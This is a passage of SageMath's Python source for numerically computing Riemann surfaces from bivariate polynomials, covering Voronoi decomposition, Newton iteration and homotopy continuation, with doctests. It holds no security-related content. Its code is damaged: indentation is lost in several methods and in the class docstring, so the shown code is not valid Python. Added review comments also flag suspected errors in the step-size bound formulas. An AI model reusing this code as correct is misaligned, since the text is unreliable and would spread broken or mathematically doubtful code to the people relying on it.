sage: K.<a>=NumberField(t^6 - t^5 + 2*t^4 + 8*t^3 - t^2 - 5*t + 7)
sage: all(len(a.minpoly().roots(K)) == a.minpoly().degree() for a in A)
True
"""
# ****************************************************************************
# Copyright (C) 2017 Alexandre Zotine, Nils Bruin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from __future__ import division
from six.moves import range
from scipy.spatial import Voronoi
from sage.arith.misc import GCD, algdep
from sage.arith.srange import srange
from sage.ext.fast_callable import fast_callable
from sage.graphs.graph import Graph
from sage.groups.matrix_gps.finitely_generated import MatrixGroup
from sage.groups.perm_gps.permgroup_named import SymmetricGroup
from sage.matrix.constructor import Matrix, matrix
from sage.matrix.special import block_matrix
from sage.misc.cachefunc import cached_method
from sage.misc.misc_c import prod
from sage.modules.free_module import VectorSpace
from sage.numerical.gauss_legendre import integrate_vector
from sage.rings.complex_field import ComplexField, CDF
from sage.rings.integer_ring import ZZ
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.qqbar import number_field_elements_from_algebraics
from sage.rings.rational_field import QQ
from sage.rings.real_mpfr import RealField
import sage.libs.mpmath.all as mpall
def voronoi_ghost(cpoints, n=6, CC=CDF):
    r"""
    Convert complex points to real pairs `(x,y)` and surround them with ``n``
    "ghost" points on a large circle.

    With ``n >= 3`` the ghost points guarantee that each original point gets a
    bounded Voronoi cell. The circle is centered on the mean of the points,
    with radius 3/2 times the largest distance from that mean, so the bounded
    cells together form a simply connected region.

    INPUT:

    - ``cpoints`` -- a list of complex numbers

    OUTPUT:

    A list of real tuples `(x,y)`: the original points followed by the ghost
    points.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import voronoi_ghost
        sage: L = [1 + 1*I, 1 - 1*I, -1 + 1*I, -1 - 1*I]
        sage: voronoi_ghost(L) # abs tol 1e-6
        [(1.0, 1.0),
        (1.0, -1.0),
        (-1.0, 1.0),
        (-1.0, -1.0),
        (2.121320343559643, 0.0),
        (1.0606601717798216, 1.8371173070873836),
        (-1.060660171779821, 1.8371173070873839),
        (-2.121320343559643, 2.59786816870648e-16),
        (-1.0606601717798223, -1.8371173070873832),
        (1.06066017177982, -1.8371173070873845)]
    """
    pts = [CC(p) for p in cpoints]
    center = sum(pts) / len(pts)
    if len(pts) == 1:
        radius = 1
    else:
        radius = 3 * max(abs(p - center) for p in pts) / 2
    zeta = CC.zeta(n)
    ghosts = [center + radius * zeta ** k for k in range(n)]
    return [(p.real_part(), p.imag_part()) for p in pts + ghosts]
def bisect(L, t):
    r"""
    Find position in a sorted list using bisection.

    Given a list `L = [(t_0,...),(t_1,...),...(t_n,...)]` with increasing `t_i`,
    find the index i such that `t_i <= t < t_{i+1}` using bisection. The rest of
    the tuple is available for whatever use required.

    INPUT:

    - ``L`` -- A list of tuples such that the first term of each tuple is a real
      number between 0 and 1. These real numbers must be increasing.

    - ``t`` -- A real number between `t_0` and `t_n`.

    OUTPUT:

    An integer i, giving the position in L where t would be in

    EXAMPLES:

    Form a list of the desired form, and pick a real number between 0 and 1::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import bisect
        sage: L = [(0.0, 'a'), (0.3, 'b'), (0.7, 'c'), (0.8, 'd'), (0.9, 'e'), (1.0, 'f')]
        sage: t = 0.5
        sage: bisect(L,t)
        1

    Another example which demonstrates that if t is equal to one of the t_i, it
    returns that index::

        sage: L = [(0.0, 'a'), (0.1, 'b'), (0.45, 'c'), (0.5, 'd'), (0.65, 'e'), (1.0, 'f')]
        sage: t = 0.5
        sage: bisect(L,t)
        3
    """
    # `lo`/`hi` replace the original locals `min`/`max`, which shadowed the
    # Python builtins of the same name. The search logic is unchanged.
    lo = 0
    hi = len(L) - 1
    # Reject t outside [t_0, t_n].
    if t < L[lo][0] or t > L[hi][0]:
        raise ValueError("value for t out of range")
    # Invariant: L[lo][0] <= t <= L[hi][0].
    while (lo < hi - 1):
        # Bisect.
        mid = (hi + lo) // 2
        # If it's equal, return the index we bisected to.
        if t == L[mid][0]:
            return mid
        # If it's smaller, then we're on the left side.
        elif t < L[mid][0]:
            hi = mid
        # Otherwise we're on the right side.
        else:
            lo = mid
    # Once the loop terminates, we return what the indices converged to.
    return lo
def numerical_inverse(C):
    """
    Compute numerical inverse of a matrix via LU decomposition

    INPUT:

    - ``C`` -- A real or complex invertible square matrix

    EXAMPLES::

        sage: C=matrix(CC,3,3,[-4.5606e-31 + 1.2326e-31*I,
        ....: -0.21313 + 0.24166*I,
        ....: -3.4513e-31 + 0.16111*I,
        ....: -1.0175 + 9.8608e-32*I,
        ....: 0.30912 + 0.19962*I,
        ....: -4.9304e-32 + 0.39923*I,
        ....: 0.96793 - 3.4513e-31*I,
        ....: -0.091587 + 0.19276*I,
        ....: 3.9443e-31 + 0.38552*I])
        sage: from sage.schemes.riemann_surfaces.riemann_surface import numerical_inverse
        sage: max(abs(c) for c in (C^(-1)*C-C^0).list()) < 1e-10
        False
        sage: max(abs(c) for c in (numerical_inverse(C)*C-C^0).list()) < 1e-10
        True
    """
    R=C.parent()
    prec = R.base_ring().prec()
    # Match mpmath's working precision to the matrix entries. NOTE(review):
    # both the global setting and the workprec context manager are set here;
    # presumably sage_to_mpmath relies on the global one -- confirm.
    mpall.mp.prec = prec
    with mpall.workprec(prec):
        # Round-trip through mpmath: convert, then take the (P)LU decomposition.
        Cmp=mpall.matrix([mpall.sage_to_mpmath(list(c),prec) for c in C])
        PLU=mpall.lu(Cmp)
    # Convert the factors back to Sage matrices and reassemble the inverse
    # as U^-1 * L^-1 * P (inverting only triangular/permutation factors is
    # numerically stabler than inverting C directly -- see the doctest).
    P,L,U=[ R([mpall.mpmath_to_sage(c,prec) for c in M]) for M in PLU]
    return U.inverse()*L.inverse()*P
class ConvergenceError(ValueError):
    r"""
    Exception raised (and caught) when a Newton iteration fails to converge.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import ConvergenceError
        sage: raise ConvergenceError("test")
        Traceback (most recent call last):
        ...
        ConvergenceError: test
        sage: isinstance(ConvergenceError(),ValueError)
        True
    """
    pass
def differential_basis_baker(f):
    r"""
    Compute a differential basis for a curve that is nonsingular outside (1:0:0),(0:1:0),(0:0:1)

    Baker's theorem tells us that if a curve has its singularities at the coordinate vertices and meets
    some further easily tested genericity criteria,
    then we can read off a basis for the regular differentials from the interior of the
    Newton polygon spanned by the monomials. While this theorem only applies to special plane curves
    it is worth implementing because the analysis is relatively cheap and it applies to a lot of
    commonly encountered curves (e.g., curves given by a hyperelliptic model). Other advantages include
    that we can do the computation over any exact base ring (the alternative Singular based method for
    computing the adjoint ideal requires the rationals), and that we can avoid being affected by subtle bugs
    in the Singular code.

    ``None`` is returned when ``f`` does not describe a curve of the relevant type. If ``f`` is of the relevant
    type, but is of genus `0` then ``[]`` is returned (which are both False values, but they are not equal).

    INPUT:

    - `f` -- a bivariate polynomial

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import differential_basis_baker
        sage: R.<x,y>=QQ[]
        sage: f=x^3+y^3+x^5*y^5
        sage: differential_basis_baker(f)
        [y^2, x*y, x*y^2, x^2, x^2*y, x^2*y^2, x^2*y^3, x^3*y^2, x^3*y^3]
        sage: f=y^2-(x-3)^2*x
        sage: differential_basis_baker(f) is None
        True
        sage: differential_basis_baker(x^2+y^2-1)
        []

    TESTS::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import differential_basis_baker
        sage: R.<x,y>=QQ[]
        sage: f = y^12 - x*(x - 1)^7
        sage: differential_basis_baker(f) is None
        True
    """
    k = f.base_ring()
    # Homogenize f to F(x,y,z) and collect F with its partial derivatives.
    R = PolynomialRing(k,3,"x,y,z")
    x,y,z = R.gens()
    F = f(x/z,y/z).numerator()
    W = [F] + [F.derivative(v) for v in R.gens()]
    #we check that the singularities lie at (1:0:0),(0:1:0),(0:0:1)
    #by checking that the eliminations of x, y, z result in (principal) ideals
    #generated by a monomial. This is a sufficient condition, but not completely necessary.
    #It's cheap to check, though.
    for c in R.gens():
        B = GCD([W[i].resultant(W[j],c) for i in range(4) for j in range(i)])
        if len(B.monomials()) > 1:
            return None
    from sage.geometry.polyhedron.constructor import Polyhedron
    # Exponent vectors of f and their coefficients; the Newton polygon P is
    # spanned by the exponents. (The comprehension's `k` is local to it and
    # does not clobber the base ring `k` used below.)
    D = { (k[0],k[1]): v for k,v in f.dict().items() }
    P = Polyhedron(D)
    kT = k['t']
    #here we check the additional genericity conditions: that the polynomials
    #along the edges of the newton polygon are square-free.
    for e in P.bounded_edges():
        h=kT([D.get(tuple(c),0) for c in Polyhedron(e).integral_points()])
        if not h.is_squarefree():
            return None
    # Interior lattice points (a,b) of the Newton polygon give the basis
    # monomials x^(a-1)*y^(b-1).
    x,y = f.parent().gens()
    return [x**(a[0]-1)*y**(a[1]-1) for a in P.integral_points() if P.interior_contains(a)]
class RiemannSurface(object):
r"""
Construct a Riemann Surface. This is specified by the zeroes of a bivariate
polynomial with rational coefficients `f(z,w) = 0`.
INPUT:
- ``f`` -- a bivariate polynomial with rational coefficients. The surface is
interpreted as the covering space of the coordinate plane in the first
variable.
- ``prec`` -- the desired precision of computations on the surface in bits
(default: 53)
- ``certification`` -- a boolean (default: True) value indicating whether
homotopy continuation is certified or not. Uncertified homotopy
continuation can be faster.
- ``differentials`` -- (default: None). If specified, provides a list of
polynomials `h` such that `h/(df/dw) dz` is a regular differential on the
Riemann surface. This is taken as a basis of the regular differentials, so
the genus is assumed to be equal to the length of this list. The results
from the homology basis computation are checked against this value.
Providing this parameter makes the computation independent from Singular.
For a nonsingular plane curve of degree `d`, an appropriate set is given
by the monomials of degree up to `d-3`.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^3 + 1
sage: RiemannSurface(f)
Riemann surface defined by polynomial f = -z^3 + w^2 + 1 = 0, with 53 bits of precision
Another Riemann surface with 100 bits of precision::
sage: S = RiemannSurface(f, prec=100); S
Riemann surface defined by polynomial f = -z^3 + w^2 + 1 = 0, with 100 bits of precision
sage: S.riemann_matrix() #abs tol 0.00000001
[0.500000000000000000000000... + 0.866025403784438646763723...*I]
We can also work with Riemann surfaces that are defined over fields with a
complex embedding, but since the current interface for computing genus and
regular differentials in Singular presently does not support extensions of
QQ, we need to specify a description of the differentials ourselves. We give
an example of a CM elliptic curve::
sage: Qt.<t> = QQ[]
sage: K.<a> = NumberField(t^2-t+3,embedding=CC(0.5+1.6*I))
sage: R.<x,y> = K[]
sage: f = y^2+y-(x^3+(1-a)*x^2-(2+a)*x-2)
sage: S = RiemannSurface(f,prec=100,differentials=[1])
sage: A = S.endomorphism_basis()
sage: len(A)
2
sage: all( len(T.minpoly().roots(K)) > 0 for T in A)
True
TESTS:
This elliptic curve has a relatively poorly conditioned set of branch
points, so it challenges the path choice a bit. The code just verifies that
the period is quadratic, because the curve has CM, but really the test is
that the computation completes at all.::
sage: prec = 50
sage: Qx.<t> = QQ[]
sage: CC = ComplexField(prec)
sage: g = t^2-t-1
sage: phiCC = g.roots(CC)[1][0]
sage: K.<phi> = NumberField(g, embedding=phiCC)
sage: R.<X,Y> = K[]
sage: f = Y^2+X*Y+phi*Y-(X^3-X^2-2*phi*X+phi)
sage: S = RiemannSurface(f,prec=prec, differentials=[1])
sage: tau = S.riemann_matrix()[0, 0]
sage: tau.algdep(6).degree() == 2
True
"""
    def __init__(self, f, prec=53, certification=True, differentials=None):
        r"""
        Initialize the Riemann surface defined by `f(z,w) = 0`.
        See the class documentation for the meaning of the parameters.
        TESTS::
            sage: R.<z,w> = QQ[]
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: S = RiemannSurface(w^2 - z^3 + 1)
            sage: TestSuite(S).run() #not tested; Unclear what pickling strategy is best.
        """
        # Initializations.
        self._prec = prec
        self._certification = certification
        self._R = f.parent()
        if len(self._R.gens()) != 2:
            raise ValueError('only bivariate polynomials supported.')
        if f.degree() <= 1:
            raise ValueError('equation must be of degree at least 2.')
        z, w = self._R.gen(0), self._R.gen(1)
        self._CC = ComplexField(self._prec)
        self._RR = RealField(self._prec)
        # Univariate polynomial rings over CC, one per variable; used to
        # find roots in one variable with the other one specialized.
        self._CCz = PolynomialRing(self._CC, [self._R.gen(0)])
        self._CCw = PolynomialRing(self._CC, [self._R.gen(1)])
        self.f = f
        if differentials is not None:
            # User-supplied basis of regular differentials: the genus is its
            # length, and no call to Singular is needed.
            self._differentials = [self._R(a) for a in differentials]
            self.genus = len(self._differentials)
        else:
            # Try Baker's theorem first (cheap); if its hypotheses fail,
            # fall back to Singular's genus computation.
            B = differential_basis_baker(f)
            if B is not None:
                self._differentials = B
                self.genus = len(B)
            else:
                self._differentials = None
                self.genus = self._R.ideal(self.f).genus()
                if self.genus < 0:
                    raise ValueError("Singular reports negative genus. Specify differentials manually.")
        # Degree of the covering map z, i.e. the w-degree of f.
        self.degree = self.f.degree(w)
        self._dfdw = self.f.derivative(w)
        self._dfdz = self.f.derivative(z)
        # Discriminant of f w.r.t. w; its roots are the branch points.
        self._discriminant = self.f.resultant(self._dfdw,w)
        # Coefficients of the polynomial for use in homotopy continuation.
        self._a0 = self._CCz(self.f.coefficient({w:self.degree})(self._CCz.gen(),0))
        self._a0roots = self._a0.roots(multiplicities=False)
        self._aks = [self._CCz(self.f.coefficient({w:self.degree - k - 1})
                               (self._CCz.gen(),0)) for k in range(self.degree)]
        # Compute the branch locus. Takes the square-free part of the discriminant
        # because of numerical issues.
        self.branch_locus = []
        for x in self._discriminant.factor():
            self.branch_locus += self._CCz(x[0](self._CCz.gen(),0)).roots(multiplicities=False)
        # Voronoi diagram and the important points associated with it
        self.voronoi_diagram = Voronoi(voronoi_ghost(self.branch_locus,CC=self._CC))
        self._vertices = [self._CC(x0,y0) for x0,y0 in self.voronoi_diagram.vertices]
        # w-fibre above each Voronoi vertex; the list order labels the sheets.
        self._wvalues = [self.w_values(z0) for z0 in self._vertices]
        self._Sn = SymmetricGroup(srange(self.degree))
        # Cache of homotopy-continuation data, keyed by downstairs edge.
        self._L = dict()
        # Fast-callable versions of f and its partials for numerical work.
        self._fastcall_f = fast_callable(f,domain=self._CC)
        self._fastcall_dfdw = fast_callable(self._dfdw,domain=self._CC)
        self._fastcall_dfdz = fast_callable(self._dfdz,domain=self._CC)
def __repr__(self):
r"""
Return a string representation of the Riemann surface class.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: RiemannSurface(f)
Riemann surface defined by polynomial f = -z^4 + w^2 + 1 = 0, with 53 bits of precision
"""
s = 'Riemann surface defined by polynomial f = %s = 0, with %s bits of precision'%(self.f, self._prec)
return s
def w_values(self, z0):
r"""
Returns the points lying on the surface above ``z0``.
INPUT:
- ``z0`` -- (complex) a point in the complex z-plane.
OUTPUT:
A set of complex numbers corresponding to solutions of `f(z_0,w) = 0`.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
Find the w-values above the origin, i.e. the solutions of `w^2 + 1 = 0`::
sage: S.w_values(0) # abs tol 1e-14
[-1.00000000000000*I, 1.00000000000000*I]
"""
return self.f(z0,self._CCw.gen(0)).roots(multiplicities=False)
@cached_method
def downstairs_edges(self):
r"""
Compute the edgeset of the Voronoi diagram.
OUTPUT:
A list of integer tuples corresponding to edges between vertices in the
Voronoi diagram.
EXAMPLES:
Form a Riemann surface, one with a particularly simple branch locus::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 + z^3 - z^2
sage: S = RiemannSurface(f)
Compute the edges::
sage: S.downstairs_edges()
[(0, 1), (0, 5), (1, 4), (2, 3), (2, 4), (3, 5), (4, 5)]
This now gives an edgeset which one could use to form a graph.
.. NOTE::
The numbering of the vertices is given by the Voronoi package.
"""
# Because of how we constructed the Voronoi diagram, the first n points
# correspond to the branch locus points.
# The regions of these points are all of the edges which don't go off
# to infinity, which are exactly the ones we want.
n = len(self.branch_locus)
desired_edges = [self.voronoi_diagram.regions[self.voronoi_diagram.point_region[i]] for i in range(n)]
# First construct the edges as a set because the regions will overlap
# and we don't want to have two of the same edge.
edges1 = set()
for c in desired_edges:
for j in range(len(c)-1):
edges1.add(frozenset((c[j],c[j+1])))
edges1.add(frozenset((c[0],c[-1])))
# Then make it into a list and sort it.
# The sorting is important - it will make computing the monodromy group
# MUCH easier.
# We orient all the edges so that we go from lower to higher
# numbered vertex for the continuation.
edges = [(i0,i1) if (i0 < i1) else (i1,i0) for (i0,i1) in edges1]
edges.sort()
return edges
def downstairs_graph(self):
r"""
Retun the Voronoi decomposition as a planar graph.
The result of this routine can be useful to interpret the labelling of
the vertices.
OUTPUT:
The Voronoi decomposition as a graph, with appropriate planar embedding.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 - z^4 + 1
sage: S = RiemannSurface(f)
sage: S.downstairs_graph()
Graph on 11 vertices
Similarly one can form the graph of the upstairs edges, which is
visually rather less attractive but can be instructive to verify that a
homology basis is likely correctly computed.::
sage: G=Graph(S.upstairs_edges()); G
Graph on 22 vertices
sage: G.is_planar()
False
sage: G.genus()
1
sage: G.is_connected()
True
"""
G=Graph(self.downstairs_edges())
G.set_pos(dict(enumerate([list(v) for v in self._vertices])))
return G
    def _compute_delta(self, z1, epsilon, wvalues=None):
        r"""
        Compute a delta for homotopy continuation when moving along a path.
        INPUT:
        - ``z1`` -- a complex number in the z-plane
        - ``epsilon`` -- a real number, which is the minimum distance between
          the w-values above ``z1``
        - ``wvalues`` -- a list (default: ``None``). If specified, saves
          recomputation.
        OUTPUT:
        A real number, which is a step size for moving along a path.
        EXAMPLES:
        Form a Riemann Surface::
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: R.<z,w> = QQ[]
            sage: f = w^2 - z^4 + 1
            sage: S = RiemannSurface(f)
        Pick a point which lies on the Voronoi diagram, and compute an
        appropriate epsilon::
            sage: z1 = S._vertices[0]
            sage: currw = S.w_values(z1)
            sage: n = len(currw)
            sage: epsilon = min([abs(currw[i] - currw[n-j-1]) for i in range(n) for j in range(n-i-1)])/3
            sage: S._compute_delta(z1, epsilon) # abs tol 1e-8
            0.152628501142363
        If the Riemann surface does not have certified homotopy continuation,
        then the delta will just be the minimum distance away from a branch
        point::
            sage: T = RiemannSurface(f, certification=False)
            sage: z1 = T._vertices[0]
            sage: currw = T.w_values(z1)
            sage: n = len(currw)
            sage: epsilon = min([abs(currw[i] - currw[n-j-1]) for i in range(n) for j in range(n-i-1)])/3
            sage: T._compute_delta(z1, epsilon) # abs tol 1e-8
            0.381881307912987
        """
        if self._certification:
            if wvalues is None:
                wvalues = self.w_values(z1)
            # For computation of rho. Need the branch locus + roots of a0.
            badpoints = self.branch_locus + self._a0roots
            # rho: radius of a disc around z1 that stays well away from every
            # bad point (half the distance to the nearest one).
            rho = min(abs(z1 - z) for z in badpoints) / 2
            # Y bounds |dw/dz| over the fibre above z1 (implicit differentiation).
            Y = max(abs(self._fastcall_dfdz(z1, wi)/self._fastcall_dfdw(z1, wi))
                    for wi in wvalues)
            # compute M
            # NOTE(review): range(ak.degree()) omits the leading coefficient of
            # ak, and the coefficients are summed before taking abs — verify
            # against the intended upper bound sum |ak[k]|(|z1|+rho)^k.
            upperbounds = [sum(ak[k] * (abs(z1) + rho)**k
                               for k in range(ak.degree()))
                           for ak in self._aks]
            upperbounds.reverse()
            # If a0 is a constant polynomial, it is obviously bounded below.
            if self._a0roots == []:
                lowerbound = self._CC(self._a0) / 2
            else:
                # NOTE(review): (zk - z1) is complex and rho real, so this
                # computes |(zk - z1) - rho|; presumably abs(abs(zk - z1) - rho)
                # is the intended lower-bound factor — confirm.
                lowerbound = self._a0[self._a0.degree()]*prod(abs((zk - z1) - rho) for zk in self._a0roots) / 2
            M = 2 * max((upperbounds[k]/lowerbound).abs().nth_root(k+1)
                        for k in range(self.degree-1))
            # Certified step size derived from rho, Y, epsilon and M.
            return rho*(((rho*Y - epsilon)**2 + 4*epsilon*M).sqrt() - (rho*Y + epsilon))/(2*M - 2*rho*Y)
        else:
            # Instead, we just compute the minimum distance between branch
            # points and the point in question.
            return min(abs(b - z1) for b in self.branch_locus) / 2
    def homotopy_continuation(self, edge):
        r"""
        Perform homotopy continuation along an edge of the Voronoi diagram using
        Newton iteration.
        INPUT:
        - ``edge`` -- a tuple of integers indicating an edge of the Voronoi
          diagram
        OUTPUT:
        A list of complex numbers corresponding to the points which are reached
        when traversing along the direction of the edge. The ordering of these
        points indicates how they have been permuted due to the weaving of the
        curve.
        As a side effect, the continuation data collected along the way is
        stored in ``self._L[edge]`` for later use by the integrators.
        EXAMPLES:
        We check that continued values along an edge correspond (up to the
        appropriate permutation) to what is stored. Note that the permutation
        was originally computed from this data::
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: R.<z,w> = QQ[]
            sage: f = z^3*w + w^3 + z
            sage: S = RiemannSurface(f)
            sage: edge1 = sorted(S.edge_permutations())[0]
            sage: sigma = S.edge_permutations()[edge1]
            sage: continued_values = S.homotopy_continuation(edge1)
            sage: stored_values = S.w_values(S._vertices[edge1[1]])
            sage: all( abs(continued_values[i]-stored_values[sigma(i)]) < 1e-8 for i in range(3))
            True
        """
        i0, i1 = edge
        ZERO = self._RR.zero()
        ONE = self._RR.one()
        # Records (T, fibre, epsilon) triples along the path for interpolation.
        datastorage = []
        z_start = self._CC(self._vertices[i0])
        z_end = self._CC(self._vertices[i1])
        path_length = abs(z_end - z_start)
        def path(t):
            # Straight-line parametrization of the edge for t in [0,1].
            return z_start*(1-t) + z_end*t
        # Primary procedure.
        T = ZERO
        currw = self.w_values(path(T))
        n = len(currw)
        # epsilon: a third of the minimal pairwise distance in the fibre;
        # Newton iterates must stay within this of their start value.
        epsilon = min([abs(currw[i] - currw[j]) for i in range(1,n) for j in range(i)])/3
        datastorage += [(T,currw,epsilon)]
        while T < ONE:
            # Certified (or heuristic) step size, rescaled to path parameter.
            delta = self._compute_delta(path(T), epsilon, wvalues=currw)/path_length
            # Move along the path by delta.
            T += delta
            # If T exceeds 1, just set it to 1 and compute.
            if T > ONE:
                delta -= (T-ONE)
                T = ONE
            # Retry with halved steps until Newton iteration converges.
            while True:
                try:
                    neww = self._determine_new_w(path(T),currw,epsilon)
                except ConvergenceError:
                    delta /= 2
                    T -= delta
                else:
                    break
            currw = neww
            epsilon = min([abs(currw[i] - currw[j]) for i in range(1,n) for j in range(i)])/3
            datastorage += [(T,currw,epsilon)]
        self._L[edge] = datastorage
        return currw
    def _determine_new_w(self, z0, oldw, epsilon):
        r"""
        A procedure to Newton iterate a list of w-values simultaneously.
        Used primarily for moving along the surface for integration or
        homotopy continuation.
        INPUT:
        - ``z0`` -- a complex number
        - ``oldw`` -- a list of w-values which are presumed to be guesses of
          the w-values above ``z0``.
        - ``epsilon`` -- the minimum distance between the points of ``oldw``
          divided by 3
        OUTPUT:
        A list of points the same length as ``oldw`` corresponding to the new
        Newton iterated points.
        However, if the Newton iteration exceeds the allotted attempts, or exits
        the ``epsilon`` ball, raises a convergence error.
        EXAMPLES:
        First, a trivial example where we guess exactly what the roots are::
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: R.<z,w> = QQ[]
            sage: f = w^2 - z^4 + 1
            sage: S = RiemannSurface(f)
            sage: z0 = S._vertices[0]
            sage: epsilon = 0.1
            sage: oldw = S.w_values(z0)
            sage: neww = S._determine_new_w(z0,oldw,epsilon); neww #abs tol 0.00000001
            [-0.934613146929672 + 2.01088055918363*I,
             0.934613146929672 - 2.01088055918363*I]
        Which should be exactly the same as the w-values we started with.::
            sage: abs(neww[0] - oldw[0]) #abs tol 0.00000001
            0.000000000000...
            sage: abs(neww[1] - oldw[1]) #abs tol 0.00000001
            0.000000000000...
        Here is an example where we exit the ``epsilon`` bound. This approach is
        based on the homotopy continuation procedure which traverses along a
        path and attempts Newton iteration::
            sage: g = z^3*w + w^3 + z
            sage: T = RiemannSurface(g)
            sage: z0 = T._vertices[2]*(0.9) - T._vertices[15]*(0.1)
            sage: epsilon = 0.5
            sage: oldw = T.w_values(T._vertices[2])
            sage: T._determine_new_w(z0,oldw,epsilon)
            [-0.562337685361648 + 0.151166007149998*I,
             0.640201585779414 - 1.48567225836436*I,
             -0.0778639004177661 + 1.33450625121437*I]
        """
        # Tools of newton iteration.
        F = self._fastcall_f
        dF = self._fastcall_dfdw
        neww = []
        prec = self._CC.prec()
        # Iterate over all roots.
        for i in range(len(oldw)):
            # First Newton step: w -> w - f(z0,w)/df/dw(z0,w).
            delta = F(z0,oldw[i])/dF(z0,oldw[i])
            Ndelta = delta.norm()
            wi = oldw[i]-delta
            #it is possible in theory that Newton iteration fails to converge
            #without escaping. We catch this by capping the number of iterations
            #by 100
            for j in range(100):
                # If we exceed the epsilon bound from homotopy continuation,
                # terminate.
                if abs(wi - oldw[i]) >= epsilon:
                    raise ConvergenceError("Newton iteration escaped neighbourhood")
                new_delta = F(z0,wi)/dF(z0,wi)
                Nnew_delta = new_delta.norm()
                # If we found the root exactly, or if delta only affects half the digits and
                # stops getting smaller, we decide that we have converged.
                # (The exponent comparison tests |delta|^2 against ulp-scale
                # of |wi|^2 at working precision.)
                if (new_delta == 0) or (Nnew_delta>=Ndelta and
                        Ndelta.sign_mantissa_exponent()[2]+prec < wi.norm().sign_mantissa_exponent()[2]):
                    neww.append(wi)
                    break
                delta=new_delta
                Ndelta=Nnew_delta
                wi-=delta
            # If we run 100 iterations without a result, terminate.
            else:
                raise ConvergenceError("Newton iteration fails to converge after %s iterations" % j)
        return neww
    def _newton_iteration(self, z0, oldw, epsilon):
        r"""
        A non-vectorized Newton iteration procedure used for integration.
        INPUT:
        - ``z0`` -- a complex number.
        - ``oldw`` -- a w-value which is presumed to be a guess of one of
          the w-values above ``z0``.
        - ``epsilon`` -- the minimum distance between the w-values divided by 3.
        OUTPUT:
        A complex number, which should be a w-value above ``z0``.
        However, if the Newton iteration exceeds the allotted attempts, or exits
        the ``epsilon`` ball, raises a convergence error.
        EXAMPLES:
        First, a trivial example where we guess exactly what the root is::
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: R.<z,w> = QQ[]
            sage: f = w^2 - z^4 + 1
            sage: S = RiemannSurface(f)
            sage: z0 = S._vertices[0]
            sage: epsilon = 0.1
            sage: oldw = S.w_values(z0)[0]
            sage: neww = S._newton_iteration(z0,oldw,epsilon); neww #abs tol 0.00000001
            -0.934613146929672 + 2.01088055918363*I
        Which should be exactly the same as the w-value we started with::
            sage: oldw - neww #abs tol 0.00000001
            0.000000000000000
        Here is an example where we exit the epsilon bound. This approach is
        based on the homotopy continuation procedure which traverses along a
        path and attempts newton iteration::
            sage: g = z^3*w + w^3 + z
            sage: T = RiemannSurface(g)
            sage: z0 = T._vertices[2]*(0.9) - T._vertices[15]*(0.1)
            sage: epsilon = 0.5
            sage: oldw = T.w_values(T._vertices[2])[0]
            sage: T._newton_iteration(z0, oldw, epsilon)
            -0.562337685361648 + 0.151166007149998*I
        """
        F = self._fastcall_f
        dF = self._fastcall_dfdw
        prec = self._CC.prec()
        # First Newton step: w -> w - f(z0,w)/df/dw(z0,w).
        delta = F(z0,oldw)/dF(z0,oldw)
        Ndelta = delta.norm()
        neww = oldw-delta
        # Comparing squared norms avoids a square root per iteration.
        eps_squared = epsilon**2
        #it is possible in theory that Newton iteration fails to converge
        #without escaping. We catch this by capping the number of iterations
        #by 100
        for j in range(100):
            if (neww-oldw).norm() > eps_squared:
                raise ConvergenceError("Newton iteration escaped neighbourhood")
            new_delta = F(z0,neww)/dF(z0,neww)
            Nnew_delta = new_delta.norm()
            # If we found the root exactly, or if delta only affects half the digits and
            # stops getting smaller, we decide that we have converged.
            if (new_delta == 0) or (Nnew_delta>=Ndelta and
                    Ndelta.sign_mantissa_exponent()[2]+prec < neww.norm().sign_mantissa_exponent()[2]):
                return neww
            delta = new_delta
            Ndelta = Nnew_delta
            neww-=delta
        raise ConvergenceError("Newton iteration fails to converge")
@cached_method
def upstairs_edges(self):
r"""
Compute the edgeset of the lift of the downstairs graph onto the Riemann
surface.
OUTPUT:
An edgeset between vertices (i, j), where i corresponds to the i-th
point in the Voronoi diagram vertices, and j is the j-th w-value
associated with that point.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 + z^3 - z^2
sage: S = RiemannSurface(f)
sage: edgeset = S.upstairs_edges()
sage: len(edgeset) == S.degree*len(S.downstairs_edges())
True
sage: {(v[0],w[0]) for v,w in edgeset} == set(S.downstairs_edges())
True
"""
edgeset = []
n = len(self._wvalues[0])
# Lifts each edge individually.
for e in self.downstairs_edges():
i0, i1 = e
# Epsilon for checking w-value later.
epsilon = min([abs(self._wvalues[i1][i] - self._wvalues[i1][n-j-1]) for i in range(n) for j in range(n-i-1)])/3
# Homotopy continuation along e.
homotopycont = self.homotopy_continuation(e)
for i in range(len(homotopycont)):
# Checks over the w-values of the next point to check which it is.
for j in range(len(self._wvalues[i1])):
if abs(homotopycont[i] - self._wvalues[i1][j]) < epsilon:
# Once it finds the appropriate w-value, adds the edge.
edgeset = edgeset + [[(i0,i),(i1,j)]]
continue
